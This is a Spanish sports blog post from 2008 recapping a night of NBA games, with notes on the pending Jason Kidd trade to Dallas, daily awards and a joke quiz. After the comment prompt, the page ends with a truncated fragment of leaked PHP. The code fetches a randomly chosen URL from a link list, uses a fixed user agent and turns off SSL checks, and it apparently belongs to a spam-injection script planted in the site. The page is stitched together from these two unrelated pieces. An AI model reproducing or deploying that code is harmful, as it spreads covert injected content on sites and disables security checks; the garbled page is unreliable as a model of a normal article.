La crónica (13/02/08)

14 de February de 2008 por MagicJohnson32

14 partidos se disputaron anoche en la NBA, lo que supone la última gran jornada antes del All-Star break ya que para hoy sólo queda un Bulls-Heat y un Mavs-Suns. Son precisamente los Mavericks los grandes protagonistas de la actualidad, y no por su victoria lograda ante los Blazers sino porque ya se da por hecho el trapaso de Jason Kidd al conjunto texano; eso si Devean George y sus Early Bird rights lo permiten.

kidddallasmavs

La crónica:

joejohnsonmcinnisLos Bobcats vencieron a los Hawks en la prórroga por 98-100 con 20 puntos y 21 rebotes de Okafor como jugador más destacado. Dwight Howard, motivado tras su enfrentamiento con Stan Van Gundy, firmó 23 puntos y 25 rebotes en el triunfo de los Magic ante Denver por 98-109. El protagonista deportivo de la noche lo encontramos en el duelo disputado por Spurs y Cavs en Cleveland: Manu Ginóbili, 46 puntos (15 de 20 en tiros), 8 asistencias, 56 de eficiencia, ganó un espectacular duelo con LeBron, que hizo 39-9 en la derrota ante San Antonio por 112-105. El escolta argentino suma, por cierto, 19 triples en los tres últimos partidos.

Los Nets ya han empezado a echar de menos a Kidd, y eso que el traspaso aún no se ha cerrado. Cayeron sin paliativos, 91-109, ante los Raptors, que volvieron a tirar de la pareja BoshCalderón (49 puntos con 17 de 24 en tiros, 10 rebotes y 16 asistencias entre ambos).

Los Grizzlies cayeron en Philadelphia 88-102 pese a otra gran actuación de Warrick, que no fue suficiente ante la pareja Iguodala-Miller, mientras que los Celticsbarbosabuzzermiss vencieron una vez más a los Knicks por 103-111 y celebraron así que Ray Allen irá al All-Star Game en sustitución de Caron Butler. En la estela de los Celtics siguen los Pistons, que vencieron 80-96 a los Pacers para sumar su décima victoria seguida en un partido sentenciado pronto y en el que hubo tiempo para los suplentes con menos oportunidades.

También en racha siguen los Hornets, que ganaron 111-107 a los Bucks y arrebataron el liderato de la Conferencia Oeste a los Suns, que cayeron 118-120 en un partido tan espectacular como se podía prever ante los Warriors. En el primero de estos partidos destacaron el cuarteto estelar de los Hornets (Paul, West, Chandler y Stojakovic) y Michael Redd con 30 puntos, mientras que en Oakland brillaron los cuatro Suns con más de 20 puntos (Nash, Barbosa, Amare y un incombustible Grant Hill) y la pareja Monta EllisBaron Davis, quienes dieron el triunfo a los locales.

Muy cerca de la cabeza del Oeste siguen los Lakers, que cerraron con récord su gira de 9 partidos: el balance de 7 victorias y 2 derrotas es el mejor jamás logrado en una gira ininterrumpida tan larga, marca que sellaron anoche en Minnesota con un cómodo triunfo 117-92 en el que el sobresalió el trío BryantGasolOdom (con triple-doble de éste).

Idéntico balance que Lakers presentan los Mavs, que ganaron 76-96 a los Blazers y esperan cerrar hoy el traspaso de Kidd. Devean George, responsable de que Kidd aún no sea jugador de Dallas, firmó un esperpéntico 0 de 11 en boozertripledoublesonicstiros de campo (y 0 de 2 en libres) y fue abucheado por el público. Aun así, y pese a la baja de Josh Howard, los Mavs no tuvieron problemas para imponerse con un gran Nowitzki, que hizo 37 puntos y 12 rebotes.

Si por la parte alta de la conferencia la lucha es cerrada, los últimos puestos de Playoffs en el Oeste llevan camino de resultar carísimos. Al triunfo de los Warriors respondieron los Rockets, que se impusieron a Sacramento 87-89 gracias a Alston, Yao y a la única canasta de Novak en todo el partido, y ya suman ocho victorias seguidas. En estos momentos, Warriors, Nuggets y Rockets están empatados entre la séptima y novena plaza del Oeste con un balance de 32-20 que les valdría para estar entre los cuatro primeros del Este. Por encima de ellos siguen los Jazz, que se impusieron en Seattle por 112-93 y con el primer triple-doble de Carlos Boozer. Por último, los Wizards lograron acabar con su racha de 8 derrotas en su visita a los Clippers, a los que vencieron 91-89 con un palmeo de Antawn Jamison a 0.3 segundos para el final. Jamison, con 29 puntos y 9 rebotes, fue el mejor del encuentro, mientras que en los locales volvió a destacar el rookie Thornton con 24 puntos.

Los premios del día son éstos:

manudevinspurscavs

Nuestro MVP: Hoy hemos tenido de todo. Dobles-dobles espectaculares como los Dirk Nowitzki, Grant Hill, Baron Davis o Amare Stoudamire, por ejemplo; exhibiciones reboteadores como las de Emeka Okafor y Dwight Howard (más de 20 rebotes y 20 puntos cada uno); actuaciones completísimas como los triples dobles de Lamar Odom o Carlos Boozer; pero todo queda empañado por los 46 puntos con 15 de 20 en tiros y 8 triples, 8 asistencias y 5 rebotes de Manu Ginóbili. ¡Qué bueno que viniste, Narigón!

El rookie: Puede ser que al final no esté tan claro el título de rookie del año. Hasta ahora Kevin Durant y Al Horford se disputaban este galardón,

pero últimamente ha aparecido un tercero en discordia. Se trata de Al Thornton, que desde que es titular promedía unos números más que interesantes. Hoy, 24 puntos y 9 rebotes para él.

La sorpresa: Encontramos jugadores que han confirmado su buen momento de forma como Larry Hughes o Leon Powe, pero también otros que han aprovechado sus minutos como Marcus Williams, titular en ausencia de Kidd, e Ike Diogu, sobrio en la derrota de los Pacers. Y además, un jugador que se ha adaptado como anillo al dedo a la forma de jugar de los Magic: Brian Cook.

La decepción: Atentos a los números del quinteto titular de Indiana: nada más y nada menos que 10 de 37 en tiros de campo, y en el banquillo Shawne Williams ha aportado un 1 de 10, completando el festival anotador de los Pacers. Parece que no se puede hacer peor. ¿Seguro? ¡Pues no! Hoy, el sustituto de Josh Howard en el quinteto de los Mavs ha conseguido una marca digna para el recuerdo: nada más y nada menos que 0 de 11 en 33 minutos de juego. Se trata del inimitable Devean George.

Pasatiempos: ¿Qué gritaba Mark Cuban anoche durante el Blazers-Mavs?

cubanblazers

A) “Señores, por favor, dejen de insultar a Devean George… ¡¡¡y mátenlo!!!”

B) “¿¿¿Que ahora mismo jugaríamos en primera ronda contra los Spurs???”

C) “¿¿¡¡Que en segunda ronda nos encontraríamos con los Suns o los Warriors!!??”

D) “Gasol & Bynum, Shaq & Amare, Boozer & Okur, West & Chandler, Duncan, Yao, Camby… Nosotros estamos con Dampier como único pívot, y yo voy y ficho a Kidd. Igual van a tener razón los que dicen que estoy loco.”

Solución: la A, claro, porque tiene que ser realmente duro que la negativa de un jugador como Devean George sea lo que te impida (por ahora) hacerte con los servicios de Jason Kidd. De todos modos, deberían plantearse por Dallas si su juego interior está en condiciones de combatir en los Playoffs con los pesos pesados del Oeste.

El premio para el ganador podría ser un 0,1% de lo que gana Cuban en un mes, pero como no veremos ese dinero en nuestra vida, os tendréis que conformar con un vídeo de tributo al gran Kidd.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>